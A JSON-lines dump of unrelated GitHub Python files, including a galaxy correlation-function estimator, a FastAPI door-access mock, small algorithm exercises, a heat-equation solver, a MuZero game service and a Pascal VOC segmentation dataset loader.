tmpDD12[:]['npairs']*tmpDD12[:]['weightavg']\n DD12_counts/=np.sum(dW)*np.sum(dW2)\n print(\"Finished after %d seconds\"%(time.time()-init))\n\n xi_reshape12 = DD12_counts.reshape(nrbins,nmu_bins)/RR_counts.reshape(nrbins,1)-1.\n\n # Compute second field pair counts\n init = time.time()\n print(\"Computing DD pair counts for second dataset\")\n tmpDD2=DDsmu(1,nthreads,binfile,mu_max,nmu_bins,dX2,dY2,dZ2,weights1=dW2,weight_type='pair_product',\n verbose=True,periodic=True)\n DD2_counts = tmpDD2[:]['npairs']*tmpDD2[:]['weightavg']\n DD2_counts/=np.sum(dW2)**2.\n print(\"Finished after %d seconds\"%(time.time()-init))\n\n xi_reshape2 = DD2_counts.reshape(nrbins,nmu_bins)/RR_counts.reshape(nrbins,1)-1.\n\n# Save output files:\nimport os\nif not os.path.exists(outdir):\n os.makedirs(outdir)\n\n# Define mu centers\nmean_mus = np.linspace(0.5/nmu_bins,1-0.5/nmu_bins,nmu_bins)\n\noutname='xi_n%d_m%d_periodic_11.dat'%(nrbins,nmu_bins)\nprint(\"Saving correlation function(s)\")\nwith open(os.path.join(outdir, outname), \"w+\") as outfile:\n for r in mean_bins:\n outfile.write(\"%.8e \"%r)\n outfile.write(\"\\n\")\n for mu in mean_mus:\n outfile.write(\"%.8e \"%mu)\n outfile.write(\"\\n\");\n for i in range(nrbins):\n for j in range(nmu_bins):\n outfile.write(\"%.8e \"%xi_reshape[i,j])\n outfile.write(\"\\n\")\n\nprint(\"Correlation function written successfully to %s\"%(outdir+outname))\n\nif multifield:\n\n outname='xi_n%d_m%d_periodic_12.dat'%(nrbins,nmu_bins)\n with open(os.path.join(outdir, outname), \"w+\") as outfile:\n for r in mean_bins:\n outfile.write(\"%.8e \"%r)\n outfile.write(\"\\n\")\n for mu in mean_mus:\n outfile.write(\"%.8e \"%mu)\n outfile.write(\"\\n\");\n for i in range(nrbins):\n for j in range(nmu_bins):\n outfile.write(\"%.8e \"%xi_reshape12[i,j])\n outfile.write(\"\\n\")\n\n print(\"Cross correlation function written successfully to %s\"%(outdir+outname))\n\n\n outname='xi_n%d_m%d_periodic_22.dat'%(nrbins,nmu_bins)\n with open(os.path.join(outdir, outname), \"w+\") as outfile:\n for r in mean_bins:\n outfile.write(\"%.8e \"%r)\n outfile.write(\"\\n\")\n for mu in mean_mus:\n outfile.write(\"%.8e \"%mu)\n outfile.write(\"\\n\");\n for i in range(nrbins):\n for j in range(nmu_bins):\n outfile.write(\"%.8e \"%xi_reshape2[i,j])\n outfile.write(\"\\n\")\n\n print(\"Second field correlation function written successfully to %s\"%(outdir+outname))\n\nif multifield:\n print(\"NB: Number of galaxies is (%d, %d)\"%(N_gal,N_gal2))\nif multifield:\n print(\"NB: Number of galaxies is %d\"%N_gal)\n","repo_name":"oliverphilcox/RascalC","sub_path":"python/xi_estimator_periodic.py","file_name":"xi_estimator_periodic.py","file_ext":"py","file_size_in_byte":7485,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"204911991","text":"from math import log2, ceil\n\nupper = list(map(int, input().split()))\n\nattempts = sum([ceil(log2(i)) for i in upper]) + 1\ncount = 0\n\nlower = [1, 1, 1]\n\nmiddle = upper[:]\n\nfor i in range(3):\n while upper[i] > lower[i]:\n middle[i] = (upper[i] + lower[i]) // 2\n print(\"?\", ' '.join((map(str, lower))), ' '.join((map(str, middle))))\n count += 1\n if (input() == \"found\"):\n upper[i] = middle[i]\n else:\n lower[i] = middle[i] + 1\n middle[i] = (upper[i] + lower[i]) // 2\n\nwhile count < attempts - 1:\n print(\"? 1 1 1 1 1 1\")\n count += 1\n input()\n\nprint(\"!\", ' '.join((map(str, lower))))\n","repo_name":"Sakamoto45/Semestr_8","sub_path":"blind_prog/scanner/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39359249956","text":"from datetime import datetime, time\nfrom typing import Optional\n\nfrom fastapi import FastAPI, HTTPException\n\n\nDOORS = [\n {\n \"id\": 1,\n \"name\": \"Front Door\",\n \"ip_address\": \"192.168.1.1\",\n },\n {\n \"id\": 2,\n \"name\": \"Back Door\",\n \"ip_address\": \"192.168.1.2\",\n },\n]\n\nTAGS = [\n {\n \"id\": 1,\n \"number\": \"FFFFF7\",\n \"enabled\": True,\n },\n {\n \"id\": 2,\n \"number\": \"FDF7DF\",\n \"enabled\": False,\n },\n {\n \"id\": 3,\n \"number\": \"FFB7EF\",\n \"enabled\": True,\n },\n {\n \"id\": 4,\n \"number\": \"EFB77E\",\n \"enabled\": True,\n },\n]\n\nSCHEDULES = [\n {\n \"id\": 1,\n \"door_id\": 1,\n \"tag_id\": 1,\n \"start\": time(hour=0, minute=0, second=0),\n \"end\": time(hour=23, minute=59, second=59),\n }, \n {\n \"id\": 2,\n \"door_id\": 1,\n \"tag_id\": 3,\n \"start\": time(hour=9, minute=0, second=0),\n \"end\": time(hour=17, minute=0, second=0),\n }, \n {\n \"id\": 3,\n \"door_id\": 2,\n \"tag_id\": 4,\n \"start\": time(hour=18, minute=0, second=0),\n \"end\": time(hour=23, minute=0, second=0),\n }, \n]\n\nACCESS_LOGS = [\n]\n\n\napp = FastAPI()\n\n@app.get(\"/doors\")\ndef read_doors():\n return DOORS\n\n@app.get(\"/doors/{door_id}\")\ndef read_door(door_id: int):\n try:\n return [d for d in DOORS if d['id'] == door_id][0]\n except IndexError:\n raise HTTPException(status_code = 404, detail= \"Id not found\")\n\n@app.get(\"/tags\")\ndef read_tags():\n return TAGS\n\n@app.get(\"/tags/{tag_id}\")\ndef read_tag(tag_id: int):\n try:\n return [t for t in TAGS if t['id'] == tag_id][0]\n except IndexError:\n raise HTTPException(status_code = 404, detail= \"Id not found\")\n\n@app.get(\"/schedules\")\ndef read_schedules(door_id: Optional[int]=None, tag_id: Optional[str]=None):\n if door_id == None and tag_id == None: return SCHEDULES\n if door_id == None: return [s for s in SCHEDULES if s['tag_id'] == tag_id]\n if tag_id == None: return [s for s in SCHEDULES if s['door_id'] == door_id]\n\n@app.get(\"/schedules/{schedule_id}\")\ndef read_schedule(schedule_id: int):\n return [t for t in SCHEDULES if t['id'] == schedule_id][0]\n\n@app.get(\"/access_logs\")\ndef read_access_logs():\n return ACCESS_LOGS\n\n@app.post(\"/access_logs\")\ndef write_access_log(tag_id: str, granted: bool, door_id: Optional[int]=None, timestamp: Optional[datetime]=datetime.now()):\n \"\"\"\n - **door_id:** if not provided, `door_id` is determined by the requesting IP address.\n - **timestamp:** if not provided, the date and time when the request is made is used.\n \"\"\"\n # This would normally lookup door based on the source IP of the request.\n if door_id == None: door_id = 1\n ACCESS_LOGS.append({\n \"tag_id\": tag_id,\n \"door_id\": door_id,\n \"granted\": granted,\n \"timestamp\": timestamp,\n })\n","repo_name":"amorphitec/amorphitec-cloud","sub_path":"aiqua-optimus/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11519162199","text":"\"\"\"\nGiven a string, find the longest palindromic contiguous substring. \nIf there are more than one with the maximum length, return any one.\n\nFor example, the longest palindromic substring of \"aabcdcb\" is \"bcdcb\". \nThe longest palindromic substring of \"bananas\" is \"anana\".\n\n\n\"\"\"\ndef longest_palindrome(s):\n list1 = []\n longest = ''\n for i in range(len(s)):\n for j in range(1, len(s)+1):\n substring = s[i:j]\n if (substring[::-1] == substring) and len(substring) > len(longest):\n longest = substring\n list1.append(longest)\n \n return list1 , longest\n\n\nsub =\"aabcdcb\" \nprint(longest_palindrome(sub))","repo_name":"laxmimaha/Daily_coding","sub_path":"problem46.py","file_name":"problem46.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42996581951","text":"# Definition for singly-linked list with a random pointer.\nclass RandomListNode(object):\n def __init__(self, x):\n self.label = x\n self.next = None\n self.random = None\n\nclass Solution(object):\n def copyRandomList(self, head):\n \"\"\"\n :type head: RandomListNode\n :rtype: RandomListNode\n \"\"\"\n newList = RandomListNode(-1)\n tail = newList\n dic = {}\n temp = head\n while temp != None:\n newNode = RandomListNode(temp.label)\n dic[id(temp)] = newNode\n \n temp = temp.next\n tail.next = newNode\n tail = newNode\n temp = head\n tail = newList.next\n while temp != None:\n if temp.random != None:\n tail.random = dic[id(temp.random)]\n temp = temp.next\n tail = tail.next\n return newList.next","repo_name":"zhuango/leetCode","sub_path":"PythonForLeetCode/138_CopyListwithRandomPointer.py","file_name":"138_CopyListwithRandomPointer.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"6639919092","text":"#programme 1#\n\ndef somme_produits(t1,t2):\n somme=0\n for a in t1:\n for b in t2:\n somme = somme + a * b\n return somme\n\n#programme 2#\n\ndef produits_sommes(t1,t2):\n somme1=0\n somme2=0\n for a in t1:\n somme1 = somme1 + a\n for b in t2:\n somme2 = somme2 + b\n return somme1 * somme2","repo_name":"TREMOUILLEThomas/P7","sub_path":"ex111.py","file_name":"ex111.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2706224631","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef time_evolution(T,a,domain):\n dt = 1e-4 #Choose the time step wisely. Check notes. If its more than a certain value solution diverges\n t = 0\n D = 4.25e-6\n\n fig,p = plt.subplots(1,5)\n\n p[0].plot(domain,T)\n p[0].set_title(\"t = 0\")\n\n temp = T.copy()\n while t<=0.01:\n t = t + dt\n for i in range(1,len(T)-1):\n temp[i] = T[i] + dt*(D/(a**2))*(T[i+1]+T[i-1]-2*T[i])\n T = temp.copy()\n p[1].plot(domain,T)\n p[1].set_title(\"t = 0.01\")\n\n while t<=0.1:\n t = t + dt\n for i in range(1,len(T)-1):\n temp[i] = T[i] + dt*(D/(a**2))*(T[i+1]+T[i-1]-2*T[i])\n T = temp.copy()\n p[2].plot(domain,T)\n p[2].set_title(\"t = 0.1\")\n\n while t<=0.4:\n t = t + dt\n for i in range(1,len(T)-1):\n temp[i] = T[i] + dt*(D/(a**2))*(T[i+1]+T[i-1]-2*T[i])\n T = temp.copy()\n p[3].plot(domain,T)\n p[3].set_title(\"t = 0.4\")\n\n while t<=1:\n t = t + dt\n for i in range(1,len(T)-1):\n temp[i] = T[i] + dt*(D/(a**2))*(T[i+1]+T[i-1]-2*T[i])\n T = temp.copy()\n p[4].plot(domain,T)\n p[4].set_title(\"t = 1\")\n\n fig.tight_layout()\n plt.show()\n\nintervals = int(input(\"Enter number of intervals for discretising x axis: \"))\ngrid = intervals + 1\ntemperature = np.ones(grid)\ninitial_temp_left = int(input(\"Enter initial temperature on the left end of x-axis (in Celcius): \"))\ninitial_temp_right = int(input(\"Enter initial temperature on the right end of x-axis (in Celcius): \"))\ninitial_temp_body = int(input(\"Enter temperature in the metal (in Celcius): \"))\ntemperature = (initial_temp_body+273)*temperature #20+273\ntemperature[0] = initial_temp_left+273 #50+273\ntemperature[len(temperature) - 1] = initial_temp_right+273 #0+273\na = (1/100)/intervals #length in metres between discrete points\ndomain = np.linspace(0,1,grid)*(1/100)\n#print(domain)\ntime_evolution(temperature,a,domain)\n","repo_name":"archibanerj/IITKGP-Computational-Physics-Spring-2021","sub_path":"Solutions/A10/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23951866153","text":"import importlib\nimport re\nimport hashlib\nimport os\nimport numpy\nfrom typing import Optional\nfrom fastapi import Body, FastAPI, HTTPException\nfrom games.abstract_game import AbstractGame\nfrom self_play_replicate import SelfPlayReplicate\nfrom replication import Replication\n\napp = FastAPI()\n\ndef get_hash_for_model(file_name: str) -> str:\n h = hashlib.md5()\n with open(file_name, 'rb') as f:\n fb = f.read()\n while len(fb) > 0:\n h.update(fb)\n fb = f.read()\n\n return h.hexdigest()\n\ndef get_game_module(game_name: str):\n if not re.match('^[a-zA-Z][a-zA-Z0-9_]*$', game_name):\n raise HTTPException(status_code=404, detail=f\"The game_name '{game_name}' is invalid.\")\n \n try:\n return importlib.import_module(\"games.\" + game_name)\n except ModuleNotFoundError as err:\n raise HTTPException(status_code=404, detail=f\"The game_name '{game_name}' is not found.\")\n\n@app.get(\"/game/{game_name}\")\ndef game_info(game_name: str):\n game_module = get_game_module(game_name)\n replicate = SelfPlayReplicate(game_module, 0)\n\n return {\n \"action_space\": replicate.config.action_space,\n \"players\": replicate.config.players,\n }\n\n\n@app.get(\"/game/{game_name}/{seed}\")\ndef first_game_status(game_name: str, seed: int):\n game_module = get_game_module(game_name)\n replicate = SelfPlayReplicate(game_module, seed)\n observation = replicate.replicate_game([])\n\n return {\n \"observation\": numpy.array(observation).tolist(),\n \"next\": replicate.game.to_play(),\n \"legal\": replicate.game.legal_actions(),\n }\n\n@app.put(\"/game/{game_name}/{seed}/action\")\ndef calculate_game_step(\n game_name: str, seed: int,\n replication: Replication,\n opponent: str, human_action: Optional[int] = None,\n temperature: Optional[float] = 0, temperature_threshold: Optional[float] = 0,\n preffered_model_hash: Optional[str] = None\n):\n if not opponent in ['self', 'random', 'expert', 'human']:\n raise HTTPException(status_code=404, detail=f\"The opponent '{opponent}' is invalid.\")\n\n if (opponent == 'human' and human_action is None \n or opponent != 'human' and human_action is not None\n ):\n raise HTTPException(status_code=400, detail=f\"The opponent is '{opponent}', but human_action is '{human_action}'.\")\n\n file_name = os.getenv(f\"MODEL_PATH_{game_name}\")\n if file_name is None or not os.path.isfile(file_name):\n raise HTTPException(status_code=404, detail=f\"The model for game_name '{game_name}' is not found.\")\n\n actual_hash = get_hash_for_model(file_name)\n if preffered_model_hash is not None and actual_hash != preffered_model_hash:\n raise HTTPException(status_code=400, detail=f\"Prefferd hash code is wrong. hash was '{actual_hash}'.\")\n\n game_module = get_game_module(game_name)\n replicate = SelfPlayReplicate(game_module, seed, checkpoint_file=file_name)\n checkpoint = replicate.checkpoint\n\n try:\n replicate_buffer = [\n (step['action'], step['root'], step['next']) for step in replication.steps\n ]\n except TypeError:\n raise HTTPException(status_code=400, detail=f\"Cannot perse the replica steps\")\n except KeyError:\n raise HTTPException(status_code=400, detail=f\"Cannot perse the replica steps\")\n\n if not all([\n action in replicate.config.action_space\n and (root is None or isinstance(root, float) or isinstance(root, int))\n and player in replicate.config.players\n for (action, root, player) in replicate_buffer\n ]):\n raise HTTPException(status_code=400, detail=f\"The replica steps are including wrong value(s).\")\n\n try:\n replicate.replicate_game(replicate_buffer)\n except ValueError as err:\n raise HTTPException(status_code=400, detail=f\"An error occurred while replicating game history: {err}\")\n\n try:\n action, action_str, observation = replicate.add_action(\n opponent,\n temperature=temperature, temperature_threshold=temperature_threshold,\n human_action=human_action)\n except ValueError as err:\n raise HTTPException(status_code=400, detail=f\"An error occurred while processing action: {err}\")\n \n return {\n \"model_hash\": actual_hash,\n \"observation\": numpy.array(observation).tolist(),\n \"next\": replicate.game.to_play(),\n \"legal\": replicate.game.legal_actions(),\n \"action\": {\n \"number\": action,\n \"text\": action_str,\n },\n \"done\": replicate.done,\n \"steps\": [{\n 'action': action,\n 'root': root,\n 'next': player,\n } for (action, root, player) in replicate.get_history_buffer()],\n }\n","repo_name":"ssashir06/muzero-http-service","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73289825104","text":"from fritzinfluxdb.classes.fritzbox.service_definitions import lua_services\n\nread_interval = 150\n\n\ndef prepare_json_response_data(response):\n \"\"\"\n handler to prepare returned json data for parsing\n \"\"\"\n\n return response.json()\n\n\nlua_services.append(\n {\n \"name\": \"System Stats\",\n \"os_min_versions\": \"7.29\",\n \"method\": \"POST\",\n \"params\": {\n \"page\": \"ecoStat\",\n \"lang\": \"de\"\n },\n \"response_parser\": prepare_json_response_data,\n \"interval\": read_interval,\n \"value_instances\": {\n \"cpu_temp\": {\n \"data_path\": \"data.cputemp.series.0.-1\",\n \"type\": int\n },\n \"cpu_utilization\": {\n \"data_path\": \"data.cpuutil.series.0.-1\",\n \"type\": int\n },\n \"ram_usage_fixed\": {\n \"data_path\": \"data.ramusage.series.0.-1\",\n \"type\": int\n },\n \"ram_usage_dynamic\": {\n \"data_path\": \"data.ramusage.series.1.-1\",\n \"type\": int\n },\n \"ram_usage_free\": {\n \"data_path\": \"data.ramusage.series.2.-1\",\n \"type\": int\n }\n }\n })\n\nlua_services.append(\n {\n \"name\": \"Energy Stats\",\n \"os_min_versions\": \"7.29\",\n \"method\": \"POST\",\n \"params\": {\n \"page\": \"energy\",\n \"lang\": \"de\"\n },\n \"response_parser\": prepare_json_response_data,\n \"interval\": read_interval,\n \"value_instances\": {\n \"energy_consumption\": {\n \"data_path\": \"data.drain\",\n \"type\": list,\n \"next\": {\n # data struct type: dict\n \"type\": int,\n \"tags_function\": lambda data: {\"name\": data.get(\"name\")},\n \"value_function\": lambda data: data.get(\"actPerc\"),\n \"exclude_filter_function\": lambda data: \"lan\" in data.keys()\n }\n }\n }\n })\n","repo_name":"bb-Ricardo/fritzinfluxdb","sub_path":"fritzinfluxdb/classes/fritzbox/service_definitions/system_stats.py","file_name":"system_stats.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"48"} +{"seq_id":"29682367626","text":"#Permet de travailler sur le nombre généré et non sur une liste\n#Meilleurs performance et gestion de la mémoire. \n\ndef fibonacci_generator():\n current, nxt = 0,1\n while True:\n current, nxt = nxt, nxt + current\n yield current\n\ndef main():\n for m in fibonacci_generator():\n print(m,end=', ')\n print()\n\nif __name__==\"__main__\":\n main()\n \n","repo_name":"TuxStory/Python3","sub_path":"yield_fibonacci.py","file_name":"yield_fibonacci.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15738220150","text":"import requests\nfrom db import SmartPhoneDB\n\nurl = \"http://127.0.0.1:8000/add_product/\"\ndb = SmartPhoneDB()\ntables = list(db.get_tables())\n# i = 0\nfor i in tables:\n for product in db.get_all(i):\n name = product['brend']\n brend = product['model']\n price = round(float(''.join(product['price'].split()[:-1]))/11350, 2)\n color = product['color']\n ram = product['ram']\n memory = product['memory']\n img = product['img_url']\n if len(name) < 7:\n name = f\"{brend} {name}\"\n \n data = {\n \"name\":name,\n \"color\":color,\n \"brend\":brend,\n \"price\": price,\n \"ram\": int(ram),\n \"memory\": int(memory),\n \"img\": img\n }\n\n response = requests.post(url, json=data)\n print(response.json())\n # break","repo_name":"JavohirJalilov/django-client-smartphone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34312925705","text":"from datetime import date\nfrom conexion_postgresql import crea_tabla_categoria, crea_tabla_cine, crea_tabla_fuente, crea_tabla_general, crea_tabla_provincia_categoria, inserta_tabla_categoria, inserta_tabla_cine, inserta_tabla_fuente, inserta_tabla_general, inserta_tabla_provincia_categoria\n\n# funcion para actualizar toda la tabla consolidada con los datos generales del proyecto\ndef actualizar_tabla_general(general):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_general()\n fecha = str(date.today())\n for row in general:\n if row[7] == \"\": row[7]= None\n if row[8] == \"\": row[8]= None\n if row[9] == \"\": row[9]= None\n if row[10] == \"\": row[10]= None\n if row[11] == \"\": row[11]= None\n localidad = str(row[5]).replace(\"'\",\"_\")\n nombre = str(row[6]).replace(\"'\",\"_\")\n direccion = str(row[7]).replace(\"'\",\"_\")\n datos = [row[0],row[1],row[2],row[3],row[4],localidad,nombre,direccion,row[8],row[9],row[10],row[11],fecha]\n inserta_tabla_general(datos)\n\n\n# funcion para actualizar toda la tabla consolidada con los datos de catregoría del proyecto\ndef actualiza_tabla_categoria(categoria):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_categoria()\n fecha = str(date.today())\n for key in categoria:\n datos = [key, categoria[key],fecha]\n inserta_tabla_categoria(datos)\n\n\n# funcion para actualizar toda la tabla consolidada con los datos de fuente del proyecto\ndef actualiza_tabla_fuente(fuente):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_fuente()\n fecha = str(date.today())\n for key in fuente:\n datos = [key, fuente[key],fecha]\n inserta_tabla_fuente(datos)\n\n\n# funcion para actualizar toda la tabla consolidada con los datos de provincia y categoría del proyecto\ndef actualiza_tabla_provincia_categoria(provincia_categoria):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_provincia_categoria()\n fecha = str(date.today())\n for key in provincia_categoria:\n row = str(key)\n row = row.split(\" - \")\n datos = [row[0],row[1],provincia_categoria[key],fecha]\n inserta_tabla_provincia_categoria(datos)\n\n\n# funcion para actualizar toda la tabla consolidada con los datos de los cines del proyecto\ndef actualiza_tabla_cine(cine):\n # crea la tabla (si se encuentra creada la elimina y genera una nueva)\n crea_tabla_cine()\n fecha = str(date.today())\n for row in cine:\n datos = [row[0],row[1],row[2],row[3],fecha]\n inserta_tabla_cine(datos)\n\n","repo_name":"JuanMVicente/Alkemy","sub_path":"src/actualizar_sql.py","file_name":"actualizar_sql.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9711086856","text":"# By submitting this assignment, I agree to the following:\r\n# \"Aggies do not lie, cheat, or steal, or tolerate those who do.\"\r\n# \"I have not given or received any unauthorized aid on this assignment.\"\r\n#\r\n# Names: Daniel Mireles\r\n# Jordan Nguyen\r\n# Tan Nguyen\r\n# Fern Moreno\r\n# Section: 540\r\n# Assignment: 4b - 4\r\n# Date: 19 September 2019\r\n\r\n#This program outputs the root(s) of the quadratic equation given inputs from the user.\r\n\r\nimport cmath\r\n\r\nA = float(input(\"Please input your A value here: \"))\r\nB = float(input(\"Please input your B value here: \"))\r\nC = float(input(\"Please input your C value here: \"))\r\n\r\nD = (B**2) - (4*A*C)\r\n\r\nroot_1 = (-B-cmath.sqrt(D))/(2*A)\r\nroot_2 = (-B+cmath.sqrt(D))/(2*A)\r\nprint()\r\nprint(\"The roots are\", root_1, \"and\", root_2)","repo_name":"DannyMireles/Python","sub_path":"Lab4_Act4.py","file_name":"Lab4_Act4.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9675430906","text":"def kth_permutation(n,k):\n permutation = []\n unused = list(range(1,n+1))\n fact = [1]*(n+1)\n for i in range(1, n+1):\n fact[i] = i*fact[i-1]\n k -=1 \n while n > 0:\n part_length = fact[n]//n\n i = k//part_length\n permutation.append(unused[i])\n unused.pop(i)\n n -= 1\n k %= part_length\n return print(''.join(map(str,permutation)))\n\nkth_permutation(n=5,k=20)\n\n\n\"\"\" def contains_all(freq1,freq2):\n for ch in freq2:\n if freq1[ch] < freq2[ch]:\n return True \"\"\"\n\n","repo_name":"rangaomkaram/Python_DataStructures","sub_path":"permutation_k.py","file_name":"permutation_k.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32989198081","text":"#!/usr/bin/env python\nimport argparse\nimport sys\nimport warnings\n\nsys.path.append(\".\")\nfrom modules.individual import IndividualActivityRecognition\n\nwarnings.simplefilter(\"ignore\")\n\n\ndef parser():\n parser = argparse.ArgumentParser()\n\n # requires\n parser.add_argument(\n \"-dd\",\n \"--data_dir\",\n required=True,\n type=str,\n help=\"path of input data\",\n )\n parser.add_argument(\n \"-sl\",\n \"--seq_len\",\n required=True,\n type=int,\n help=\"sequential length\",\n )\n\n # options\n parser.add_argument(\n \"-g\", \"--gpus\", type=int, nargs=\"*\", default=None, help=\"gpu ids\"\n )\n parser.add_argument(\n \"-mt\",\n \"--model_type\",\n type=str,\n default=\"ganomaly\",\n help=\"'ganomaly', 'role_estimation\",\n )\n parser.add_argument(\n \"-dt\",\n \"--data_type\",\n type=str,\n default=\"local\",\n help=\"'ganomaly': Input data type. Selected by 'global', 'local', or 'both', by defualt is 'local'.\",\n )\n parser.add_argument(\n \"-msk\",\n \"--masking\",\n default=False,\n action=\"store_true\",\n help=\"'ganomaly': Masking low confidence score keypoints\",\n )\n parser.add_argument(\n \"-an\",\n \"--annotation_path\",\n type=str,\n default=None,\n help=\"'role_estimation': annotation file path\",\n )\n\n args = parser.parse_args()\n\n # delete last slash\n args.data_dir = args.data_dir[:-1] if args.data_dir[-1] == \"/\" else args.data_dir\n\n args.model_type = args.model_type.lower()\n\n return args\n\n\ndef main():\n args = parser()\n\n iar = IndividualActivityRecognition(\n args.model_type,\n args.seq_len,\n data_type=args.data_type,\n masking=args.masking,\n stage=\"train\",\n )\n iar.train(args.data_dir, args.gpus, annotation_path=args.annotation_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kojikojiprg/individual_anomaly","sub_path":"tools/train_individual.py","file_name":"train_individual.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13001556578","text":"import sys\nsys.stdin = open(\"D5_3462_input.txt\", \"r\")\n\nnum = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29]\nT = int(input())\nfor test_case in range(T):\n A, B = map(int, input().split())\n A, B = A / 100, B / 100\n PA, PB = 0, 0\n\n for i in range(31):\n if i not in num:\n a = pow(1 - A, 30 - i) * pow(A, i)\n b = pow(1 - B, 30 - i) * pow(B, i)\n combi = 1\n for j in range(i):\n combi *= (30 - j) / (1 + j)\n PA += a * combi\n PB += b * combi\n print(\"#{} {}\".format(test_case + 1, \"%0.5f\" % (1 - PA * PB)))","repo_name":"hongyong3/TIL","sub_path":"Algorithm/Swea/D5_3462.py","file_name":"D5_3462.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32295318106","text":"import tarfile\r\nimport urllib\r\nimport PIL\r\nimport os\r\nimport numpy\r\nimport torch\r\nimport albumentations as A\r\n\r\nclass VOCdataset:\r\n def __init__(self, split='train', root='datasets',\r\n aug=A.Compose([\r\n A.PadIfNeeded(min_height=256, min_width=256),\r\n A.RandomCrop(height=256, width=256),\r\n A.HorizontalFlip(p=0.5),\r\n A.RandomBrightnessContrast(p=0.2),\r\n A.ShiftScaleRotate(p=0.5),\r\n A.HueSaturationValue(hue_shift_limit=0.2, sat_shift_limit=0.2, val_shift_limit=0.2, p=0.5),\r\n A.RGBShift(r_shift_limit=15, g_shift_limit=15, b_shift_limit=15, p=0.5),\r\n A.Blur(blur_limit=3)\r\n ])):\r\n self.root = root\r\n self.aug = aug\r\n tar_path = os.path.join(root, 'VOC/VOC.zip')\r\n dir_path = os.path.join(root, 'VOC')\r\n if not os.path.exists(dir_path):\r\n os.makedirs(dir_path)\r\n url = \"http://host.robots.ox.ac.uk/pascal/VOC/voc2012/VOCtrainval_11-May-2012.tar\"\r\n with open(tar_path, 'wb+') as fout:\r\n fout.write(urllib.request.urlopen(url).read())\r\n fout.close()\r\n\r\n if os.path.exists(tar_path):\r\n with tarfile.open(tar_path) as tar_ref:\r\n tar_ref.extractall(dir_path)\r\n\r\n os.remove(tar_path)\r\n\r\n self.images = []\r\n for line in open(os.path.join(dir_path, 'VOCdevkit', 'VOC2012',\r\n 'ImageSets', 'Segmentation',\r\n split + '.txt')):\r\n self.images.append(line.strip())\r\n\r\n def __len__(self):\r\n return len(self.images)\r\n\r\n def __getitem__(self, index):\r\n img_name = self.images[index]\r\n img_path = os.path.join(self.root, 'VOC', 'VOCdevkit', 'VOC2012',\r\n 'JPEGImages', img_name + '.jpg')\r\n seg_path = os.path.join(self.root, 'VOC', 'VOCdevkit', 'VOC2012',\r\n 'SegmentationClass', img_name + '.png')\r\n img = numpy.array(PIL.Image.open(img_path))\r\n seg = numpy.array(PIL.Image.open(seg_path))\r\n\r\n res = self.aug(image=img, mask=seg)\r\n\r\n img = torch.tensor(res['image']).permute(2, 0, 1)\r\n seg = torch.tensor(res['mask'])\r\n seg[seg == 255] = 0\r\n\r\n return {'image': img.float() / 255.0, 'seg': seg.long()}\r\n","repo_name":"pleteneva/VOC_segmentation","sub_path":"VOCDataset.py","file_name":"VOCDataset.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14277130437","text":"import matplotlib\nmatplotlib.use(\"TkAgg\")\nfrom matplotlib import pyplot\n\nmachine_count = [18, 4, 2]\nmachine_name = [\"PC\", \"MAC\", \"Linux\"]\npyplot.pie(machine_count, labels = machine_name, autopct = \"%.2f%%\", shadow = True, explode = [0, 0.2, 0])\npyplot.title(\"PC vs MAC vs Linux Usage\")\npyplot.axis(\"equal\")\npyplot.show()","repo_name":"NguyenNamDan/nguyennamdan-labs-c4e23","sub_path":"lab1/hw/study2.py","file_name":"study2.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24567445608","text":"#### 